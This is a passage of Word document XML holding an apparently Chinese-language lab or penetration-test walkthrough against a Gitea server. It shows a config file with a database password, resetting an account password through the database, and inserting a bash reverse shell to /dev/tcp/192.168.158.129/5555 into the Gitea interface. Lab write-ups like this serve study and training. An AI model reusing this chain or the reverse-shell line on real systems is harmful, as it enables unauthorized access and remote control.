            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>postgres</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mssql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" or "sqlite3".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1457131D" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r>
              <w:t xml:space="preserve">DB_TYPE             = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6B84F7F4" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRPr="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>HOST                = 127.0.0.1:3306</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67294339" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRPr="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">NAME                = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>gitea</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3504DE04" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRPr="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">USER                = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>gitea</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="16C6000B" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRPr="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>; Use PASSWD = `your password` for quoting if you use special characters in the password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FC6F80" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r w:rsidRPr="00C4358C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>PASSWD              = UfFPTF8C8jjxVF2m</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234E629C" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r>
              <w:t>; For Postgres, schema to use if different from "public". The schema must exist beforehand,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1129BDBC" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r>
              <w:t>; the user must have creation privileges on it, and the user search path must be set</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09609E95" w14:textId="77777777" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C">
            <w:r>
              <w:t xml:space="preserve">; to the look into the schema first. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>e.g.:ALTER</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> USER </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> SET SEARCH_PATH = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>schema_name,"$user",public</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C96F2D" w14:textId="2BB07ABE" w:rsidR="00C4358C" w:rsidRDefault="00C4358C" w:rsidP="00C4358C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="608E28AB" w14:textId="7E5EC39B" w:rsidR="00762DB7" w:rsidRDefault="00762DB7"/>
    <w:p w14:paraId="148303F4" w14:textId="6305891D" w:rsidR="00C4358C" w:rsidRDefault="00C4358C">
      <w:r>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录新发现的数据库用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A15A5" w14:textId="62290366" w:rsidR="00C4358C" w:rsidRDefault="001D565A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2488619C" wp14:editId="3E411756">
            <wp:extent cx="5274310" cy="1764665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="16" name="图片 1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, 电子邮件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52FE" w14:textId="2DE831B8" w:rsidR="001D565A" w:rsidRDefault="001D565A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改账户密码为password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC82740" w14:textId="6D91CD7A" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密文：</w:t>
      </w:r>
      <w:r w:rsidRPr="001D565A">
        <w:t>8c1081ea93e4803d6aa627fca52970b8bb06c35e7fa2c47e1eae3e4f5e6c9515dfaf13d62292547583aef0ee683f92e71c40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D84B863" w14:textId="37A25334" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695ED64B" w14:textId="619A7DBF" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6FBD9" w14:textId="48564E30" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D565A">
        <w:instrText>http://192.168.158.130:8585/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D41BDC">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>http://192.168.158.130:8585/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9CEA48" w14:textId="6D051792" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77662B74" w14:textId="0DE689A4" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pP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进入该界面构造反弹shell语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B0D8D" w14:textId="1EE24B7C" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B9F7AB4" wp14:editId="252F33C8">
            <wp:extent cx="5274310" cy="2647315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="17" name="图片 1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65A" w14:paraId="1BB31961" w14:textId="77777777" w:rsidTr="001D565A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5388C8" w14:textId="6152B11E" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-attribute"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="383A42"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"exec bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/192.168.15</w:t>
            </w:r>
            <w:r w:rsidR="000A6DE0">
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r w:rsidR="000A6DE0">
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="hljs-string"/>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="50A14F"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/5555 0&gt;&amp;1"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
                <w:color w:val="383A42"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
              </w:rPr>
              <w:t>   </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A76A6FD" w14:textId="1B81FFAD" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入上面的语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A4379" w14:textId="3DC271C2" w:rsidR="001D565A" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28AC36AD" wp14:editId="64EB9BBC">
            <wp:extent cx="5274310" cy="2546985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="18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FFFB" w14:textId="77777777" w:rsidR="001D565A" w:rsidRPr="00DA3B81" w:rsidRDefault="001D565A" w:rsidP="001D565A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001D565A" w:rsidRPr="00DA3B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20"/>
    <w:rsid w:val="000A6DE0"/>
    <w:rsid w:val="001D565A"/>
    <w:rsid w:val="00462620"/>
    <w:rsid w:val="00762DB7"/>
    <w:rsid w:val="00936AAA"/>
    <w:rsid w:val="00A2680D"/>
    <w:rsid w:val="00B42F8C"/>
    <w:rsid w:val="00C42122"/>
    <w:rsid w:val="00C4358C"/>
    <w:rsid w:val="00CA67F2"/>
    <w:rsid w:val="00D46A62"/>
    <w:rsid w:val="00DA3B81"/>
    <w:rsid w:val="00F9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A92A3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0704EBAA-5351-4A1E-9ABD-142759BC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565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D565A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001D565A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001D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A7AC-DAA5-468B-A939-6D2D4A30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 夏</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>知 夏</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-29T03:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-08T02:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>